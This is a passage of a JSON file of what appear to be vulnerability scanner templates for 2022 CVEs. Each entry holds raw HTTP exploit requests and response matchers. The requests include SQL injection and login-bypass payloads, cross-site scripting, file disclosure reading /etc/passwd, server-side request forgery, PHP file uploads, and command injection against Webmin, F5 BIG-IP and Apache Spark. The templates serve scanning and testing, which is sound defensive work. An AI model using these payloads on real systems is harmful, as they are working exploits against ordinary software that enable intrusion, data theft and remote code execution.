5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-21500","info":{"name":"Oracle E-Business Suite <=12.2 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp"],"matchers-condition":"and","matchers":[{"type":"word","words":["Registration","Register as individual","<!-- ibeCZzpRuntimeIncl.jsp end -->"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25216","info":{"name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34045","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24716","info":{"name":"Icinga Web 2 - Arbitrary File Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0189","info":{"name":"WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nid=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0595","info":{"name":"WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161\n\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"size_limit\"\n\n10485760\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.svg\"\nContent-Type: image/jpeg\n\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\n-----------------------------92633278134516118923780781161--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"alert(document.domain)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-23102","info":{"name":"SINEMA Remote Connect Server < V2.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: csrftoken={{csrf}};\nReferer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\ncsrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n"],"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name='csrfmiddlewaretoken' value='(.*)' />"],"internal":true}]}]},{"id":"CVE-2022-31373","info":{"name":"SolarView Compact 6.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/Solar_AiConf.php/\"><script>alert(document.domain)</script>","HREF=\"Solar_Service.php\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1910","info":{"name":"WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["widget-title\"><script>alert(document.domain)</script></h3>","aux-widget"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1398","info":{"name":"External Media without Import <=1.1.2 - Authenticated Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/upload.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_2","words":["external-media-without-import"]}]}]},{"id":"CVE-2022-41441","info":{"name":"ReQlogic v11.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script>","{{BaseURL}}/ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3"],"stop-at-first-match":true,"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"POProcessTimeout\")"],"condition":"and"}]}]},{"id":"CVE-2022-31981","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Control Teams\")"],"condition":"and"}]}]},{"id":"CVE-2022-28032","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Page Deleted\")"],"condition":"and"}]}]},{"id":"CVE-2022-38637","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/user-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>User  | Dashboard</title>","Book My Appointment"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28080","info":{"name":"Royal Event - SQL Injection","severity":"high"},"requests":[{"raw":["POST /royal_event/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 353\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"login\"\n\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD--\n","POST /royal_event/btndates_report.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"todate\"\n\n1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"search\"\n\n3\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"fromdate\"\n\n01/01/2011\n------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(\"{{randstr}}\")}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4897","info":{"name":"WordPress BackupBuddy <8.8.3 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"onload=alert(document.domain)\")","contains(body_2, \"BackupBudddy iFrame\")"],"condition":"and"}]}]},{"id":"CVE-2022-32772","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertInfo(\"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0591","info":{"name":"Formcraft3 <3.8.28 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: WordPress"]}]}]},{"id":"CVE-2022-2219","info":{"name":"Unyson < 2.7.27 - Cross Site Scripting","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback<script>alert(document.domain)</script>  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")","contains(body_2, \"Unyson\")"],"condition":"and"}]}]},{"id":"CVE-2022-43014","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\"></a>%20<script>alert(document.domain)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0482","info":{"name":"Easy!Appointments <1.4.3 - Broken Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncsrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"appointments\":","\"unavailables\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","name":"csrf_token","internal":true,"kval":["csrfCookie"],"part":"header"}]}]},{"id":"CVE-2022-4320","info":{"name":"WordPress Events Calendar <1.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\"><script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["imgNavLeftXX\\\"><script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>({});","><script>alert(document.cookie)</script>.js"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43164","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0220","info":{"name":"WordPress GDPR & CCPA <1.9.27 -  Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}\n"],"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_2, 'text/html')","status_code_2 == 200","contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-42746","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-1057","info":{"name":"WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-21705","info":{"name":"October CMS -  Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onSave\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onCreateTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&type=page\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onOpenTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["function onInit()","phpinfo()","Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`."],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"session_key","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[1]"],"attribute":"value"},{"type":"xpath","name":"token","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[2]"],"attribute":"value"},{"type":"regex","name":"theme","group":1,"regex":["<input\\stype=\\\\\"hidden\\\\\"\\svalue=\\\\\"demo\\\\\"\\sname=\\\\\"([^\"]*)\\\\\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-27927","info":{"name":"Microfinance Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33891","info":{"name":"Apache Spark UI - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/doAs?=`{{url_encode(\"{{command}}\")}}`"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["19833-2202-EVC"]}]}]},{"id":"CVE-2022-30513","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1388","info":{"name":"F5 BIG-IP iControl - REST Auth Bypass RCE","severity":"critical"},"requests":[{"raw":["POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: localhost\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["commandResult","8831-2202-EVC"],"condition":"and"}]}]},{"id":"CVE-2022-38296","info":{"name":"Cuppa CMS v1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /js/jquery_file_upload/server/php/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"path\"\n\n/\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"unique_name\"\n\ntrue\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_width\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_height\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"crop\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"compress\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\nContent-Type: image/jpeg\n\n<?php\n\necho md5(\"CVE-2022-38296\");\n\n?>\n------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n","POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["ed6bf8b1b4b8e64836455fe32b958c2c"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["\"name\":\"(.*?)\","],"internal":true}]}]},{"id":"CVE-2022-46934","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls"],"matchers-condition":"and","matchers":[{"type":"word","words":["document.getElementById(\"http://\");alert(document.domain);//\").click();","viewer.min.css"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47945","info":{"name":"Thinkphp Lang - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?lang=../../thinkphp/base","{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Call Stack","class=\"trace"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-31854","info":{"name":"Codoforum 5.1 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /admin/?page=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n","GET /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"site_title\"\n\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\nContent-Type:  application/x-httpd-php\n\n<?php\n\necho md5('CVE-2022-31854');\n\n?>\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"CSRF_token\"\n\n{{csrf}}\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n","GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>"],"internal":true}]}]},{"id":"CVE-2022-36446","info":{"name":"Webmin <1.997 - Authenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}\n","POST /package-updates/update.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\nmode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}","uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31976","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_request HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-25487","info":{"name":"Atom CMS v2.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /admin/uploads.php?id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; 